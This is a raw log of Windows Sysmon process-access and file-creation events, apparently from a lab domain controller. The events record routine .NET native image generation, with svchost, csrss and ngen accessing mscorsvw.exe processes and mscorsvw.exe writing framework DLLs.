10341000x80000000000000007040Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:44.892{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45E0-6000-E102-000000009A01}4996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007039Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:44.877{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45E0-6000-E102-000000009A01}4996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007038Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:44.877{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45E0-6000-E102-000000009A01}4996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007037Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:44.642{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45E0-6000-E002-000000009A01}2824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007036Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:44.627{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45E0-6000-E002-000000009A01}2824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007035Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:44.627{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45E0-6000-E002-000000009A01}2824C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007034Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:44.580{08A6967A-45E0-6000-DF02-000000009A01}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\a0c-0\System.Windows.Presentation.dll2021-01-14 13:23:44.580 10341000x80000000000000007033Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:44.502{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45E0-6000-DF02-000000009A01}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007032Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:44.486{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45E0-6000-DF02-000000009A01}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007031Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:44.486{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45E0-6000-DF02-000000009A01}2572C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007030Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:44.439{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45E0-6000-DE02-000000009A01}3036C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007029Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:44.424{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45E0-6000-DE02-000000009A01}3036C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007028Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:44.424{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45E0-6000-DE02-000000009A01}3036C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007027Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:44.361{08A6967A-45E0-6000-DD02-000000009A01}4672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1240-0\System.Windows.Input.Manipulations.dll2021-01-14 13:23:44.361 10341000x80000000000000007026Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:44.158{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45E0-6000-DD02-000000009A01}4672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007025Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:44.142{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45E0-6000-DD02-000000009A01}4672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007024Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:44.142{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45E0-6000-DD02-000000009A01}4672C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007023Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:44.033{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45E0-6000-DC02-000000009A01}2952C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007022Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:44.017{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45E0-6000-DC02-000000009A01}2952C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007021Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:44.017{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45E0-6000-DC02-000000009A01}2952C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007041Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:46.939{08A6967A-45E0-6000-E102-000000009A01}4996C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1384-0\System.Workflow.Activities.dll2021-01-14 13:23:46.939 10341000x80000000000000007047Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:47.221{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45E3-6000-E302-000000009A01}3084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007046Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:47.221{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45E3-6000-E302-000000009A01}3084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007045Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:47.221{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45E3-6000-E302-000000009A01}3084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007044Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:47.080{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45E3-6000-E202-000000009A01}1200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007043Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:47.064{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45E3-6000-E202-000000009A01}1200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007042Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:47.064{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45E3-6000-E202-000000009A01}1200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007054Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 